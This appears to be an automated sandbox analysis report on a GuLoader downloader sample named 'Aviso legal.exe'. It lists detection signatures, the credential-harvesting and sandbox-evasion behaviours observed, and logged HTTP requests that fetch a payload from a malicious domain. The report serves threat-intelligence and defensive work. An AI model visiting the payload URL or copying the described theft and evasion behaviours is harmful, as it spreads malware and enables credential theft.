Edit tour

Windows Analysis Report
Aviso legal.exe

Overview

General Information

Sample name:	Aviso legal.exe
Analysis ID:	1445943
MD5:	c7ae7bfda7f71b76c6f3213cfe94529e
SHA1:	eebcb778056a8fa9a33255141d70ffac41523caf
SHA256:	93b75e7f99768d86cb26282a3164d806d36a2c890fb7d367f0cf389a75d304d4
Infos:

Detection

GuLoader

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

Aviso legal.exe (PID: 8552 cmdline: "C:\Users\user\Desktop\Aviso legal.exe" MD5: C7AE7BFDA7F71B76C6F3213CFE94529E)

Aviso legal.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\Aviso legal.exe" MD5: C7AE7BFDA7F71B76C6F3213CFE94529E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.6069498581.00000000362C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1406570812.0000000005C09000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Aviso legal.exe PID: 6196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Aviso legal.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://lovekelley.ru.com/FroOsE89.bin

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Aviso legal.exe

ReversingLabs: Detection: 18%

Source: Aviso legal.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49796 version: TLS 1.2

Source: Aviso legal.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	10_2_00405C49
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00406873 FindFirstFileW,FindClose,	10_2_00406873
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0040290B FindFirstFileW,	10_2_0040290B

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /FroOsE89.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lovekelley.ru.comCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /FroOsE89.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lovekelley.ru.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: lovekelley.ru.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: Aviso legal.exe, 00000000.00000000.954159692.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Aviso legal.exe, 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Aviso legal.exe, 0000000A.00000000.1264288005.000000000040A000.00000008.00000001.01000000.00000003.sdmp

String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49796 version: TLS 1.2

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056DE

Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040352D
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0040352D EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,LdrInitializeThunk,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		10_2_0040352D

Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_0040755C	0_2_0040755C
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_00406D85	0_2_00406D85
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_705B1BFF	0_2_705B1BFF
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0040755C	10_2_0040755C
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00406D85	10_2_00406D85
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0016D0B8	10_2_0016D0B8
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0016A3B8	10_2_0016A3B8
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0016AFD0	10_2_0016AFD0
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00160600	10_2_00160600
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0016A700	10_2_0016A700
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_3611EE00	10_2_3611EE00
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_36113EE8	10_2_36113EE8
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_3611CCC0	10_2_3611CCC0
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_39304570	10_2_39304570
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_393009D0	10_2_393009D0
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_395D5938	10_2_395D5938
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_395D40C8	10_2_395D40C8
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_395DC320	10_2_395DC320
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_361149D2	10_2_361149D2

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: String function: 00402DA6 appears 51 times

Source: Aviso legal.exe

Static PE information: invalid certificate

Source: Aviso legal.exe, 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameudsttelsers.exeDVarFileInfo$ vs Aviso legal.exe
Source: Aviso legal.exe, 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameudsttelsers.exeDVarFileInfo$ vs Aviso legal.exe
Source: Aviso legal.exe, 0000000A.00000002.6069195801.0000000036069000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Aviso legal.exe

Source: Aviso legal.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@3/22@2/2

Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040352D
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0040352D EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,LdrInitializeThunk,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		10_2_0040352D

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040498A

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\Aviso legal.exe

File created: C:\Users\user\AppData\Local\Cabdriver.ini

Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Aviso legal.exe

File created: C:\Users\user\AppData\Local\Temp\nsqA690.tmp

Jump to behavior

Source: Aviso legal.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Aviso legal.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Aviso legal.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Aviso legal.exe

ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\Aviso legal.exe

File read: C:\Users\user\Desktop\Aviso legal.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"
Source: C:\Users\user\Desktop\Aviso legal.exe	Process created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"
Source: C:\Users\user\Desktop\Aviso legal.exe	Process created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Aviso legal.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1406570812.0000000005C09000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 0_2_705B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_705B1BFF

Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_705B30C0 push eax; ret	0_2_705B30EE
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00160C6D push edi; retf	10_2_00160C7A
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00160CCB push edi; retf	10_2_00160C7A
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_395DD488 push esp; retf	10_2_395DD489

Source: C:\Users\user\Desktop\Aviso legal.exe

File created: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
